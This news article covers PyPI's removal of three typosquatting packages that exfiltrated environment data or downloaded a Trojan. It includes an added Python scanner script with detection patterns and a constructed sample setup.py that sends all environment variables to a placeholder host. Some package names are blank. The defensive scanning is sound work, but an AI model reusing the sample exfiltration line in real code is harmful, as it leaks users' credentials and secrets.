PyPI admins remove three malicious packages after more than 10,000 downloads

Adam Bannister December 14, 2021 at 16:09 UTC

Updated: December 15, 2021 at 08:04 UTC

Two packages went undetected for 10 months

UPDATE The Python Package Index (PyPI) has removed malware-deploying and data-stealing packages that had collectively been downloaded thousands of times.

The trio of malicious packages tricked unsuspecting users by typosquatting the names of legitimate packages.

‘Good reputation’

In the case of two packages that exfiltrated data from compromised systems, the number of downloads was also potentially inflated by the way the authors deceptively bolstered their credibility.

“Both of these packages included their source code URL as an existing popular library, so anyone accessing the package in PyPI or analyzing the popularity of the library would see a lot of GitHub stars and forks, indicating a good reputation,” said Andrew Scott, product manager at Palo Alto and maintainer of the Python security project Ochrona Security, in a Medium blog post.

Uploaded by the same user, both packages – ” and ” – seemed to target users of Apache Mesos, which is used to manage computer clusters.


They were uploaded to PyPI in February 2021 and have since been downloaded more than 10,000 times, including more than 600 downloads in the last month alone.

Scott thanked the Python security team for removing the packages promptly on December 13, the same day he notified them.

A third, Trojan-smuggling package dubbed ” saw around 600 downloads between appearing on PyPI on December 1 and being removed after PyPI administrators were alerted on December 10.

“I believe aws-login0tool was intended to confuse users of a tool called aws-login-tool which no longer exists on PyPI, but is on some older mirrors,” Scott told The Daily Swig.

“The dpp-client packages I have to assume are maybe [intended to imitate] an internal component of some sort of data processing pipeline tool, but I haven’t been able to confirm this.”

Malicious operations

All three packages were flagged as potentially malicious through the same import chain, which Scott singled out “because it is commonly used to exfiltrate data or download malicious files”.

The data-stealing pair gathered environment variables and file lists, apparently looking for files related to Apache Mesos, and relayed them “to an unknown web service”.

The third package performed a standard package installation before fetching a file “from any domain” and attempting to execute it – a known Windows Trojan.

“It’s hard to know what the impact would be,” Scott said. “The Trojan package would only be limited to malware capabilities and data extraction will really depend on your environment – but I could definitely see it harvesting things like AWS credentials and other API keys. I’m less sure about Mesos-specific information that is stored in targeted directories.”

PyPI survey

The findings emerged from a static analysis of around 200,000 PyPI packages – nearly two-thirds of the total – which Scott downloaded with the PyPI mirroring tool Bandersnatch.

He extracted the packages by writing “a fairly simple Python script to recursively loop through Bandersnatch’s somewhat complicated folder structure, then unzip and extract each sdist, egg, or wheel into a flat directory.

“Once extracted, I ran a number of string and regular expression searches using grep, then manually reviewed the results,” Scott said.
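The extract-then-grep sweep Scott describes, as an added example that is not his script or Ochrona's code: it walks a Bandersnatch-style mirror tree, unpacks each sdist, wheel or egg into its own flat directory (refusing tar members that would escape it), and then greps the result for the kind of import chain and environment-harvesting code the article mentions. The directory layout, the indicator patterns and the two sample packages are constructed assumptions, and a hit is a triage lead for manual review, not proof of malice.

```python
import re, tarfile, tempfile, zipfile
from pathlib import Path

# Triage indicators modelled on the article: a network import often used for exfiltration or
# downloading, environment harvesting, and code-execution primitives. Hints for review, not proof.
INDICATORS = {
    "urllib_import": re.compile(r"^\s*(import|from)\s+urllib", re.M),
    "env_harvest": re.compile(r"os\.environ"),
    "exec_primitive": re.compile(r"\b(exec|eval|subprocess\.(Popen|run|call))\s*\("),
}
ARCHIVES = (".tar.gz", ".zip", ".whl", ".egg")  # sdist, wheel and egg containers

def extract_archives(mirror_root: Path, out_dir: Path) -> list[Path]:
    """Walk a Bandersnatch-style tree and unpack every archive into its own flat directory."""
    extracted = []
    for path in sorted(p for p in mirror_root.rglob("*") if p.name.endswith(ARCHIVES)):
        dest = out_dir / path.name.replace(".", "_")  # one flat directory per archive
        if path.name.endswith(".tar.gz"):
            with tarfile.open(path) as tf:  # refuse members that would escape dest
                if any(dest.resolve() not in (dest / m.name).resolve().parents for m in tf.getmembers()):
                    raise ValueError(f"path traversal in {path.name}")
                tf.extractall(dest)
        else:  # .whl, .egg and .zip are all zip files; zipfile strips '..' and leading '/'
            with zipfile.ZipFile(path) as zf:
                zf.extractall(dest)
        extracted.append(dest)
    return extracted

def scan_for_indicators(root: Path) -> dict[str, list[str]]:
    """grep-style pass over extracted .py files; returns {relative path: [indicator names]}."""
    hits = {}
    for py in sorted(root.rglob("*.py")):
        matched = [n for n, rx in INDICATORS.items() if rx.search(py.read_text(errors="replace"))]
        if matched:
            hits[str(py.relative_to(root))] = matched
    return hits

def run_demo() -> dict[str, list[str]]:
    """Constructed sample mirror (not real packages): one exfiltrating sdist, one benign wheel."""
    base = Path(tempfile.mkdtemp())
    pkgs = base / "web" / "packages" / "ab"
    pkgs.mkdir(parents=True)
    (base / "setup.py").write_text("import os\nimport urllib.request\nfrom setuptools import setup\n"
        "urllib.request.urlopen('http://example.invalid/c', data=repr(dict(os.environ)).encode())\n")
    with tarfile.open(pkgs / "demo-bad-0.1.tar.gz", "w:gz") as tf:
        tf.add(base / "setup.py", arcname="demo-bad-0.1/setup.py")
    with zipfile.ZipFile(pkgs / "demo_good-0.1-py3-none-any.whl", "w") as zf:
        zf.writestr("demo_good/__init__.py", "def add(a, b):\n    return a + b\n")
    extract_archives(base / "web", base / "flat")
    return scan_for_indicators(base / "flat")
```

Running `run_demo()` flags only the sdist's setup.py, for its urllib import and os.environ access; on a real mirror the same two functions take the Bandersnatch `web/` root and a scratch directory, and the indicator table is where a reviewer would add further patterns.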

This technique also revealed a minor vulnerability in an open source package developed by a commercial vendor.

Scott said Ochrona, an open source software composition analysis tool, can help developers if they are using a mirror or want to check whether the packages are present in their project.

He also intends to update and refine his package analysis and will release additional results later.

This article was updated with additional commentary from Andrew Scott on December 14

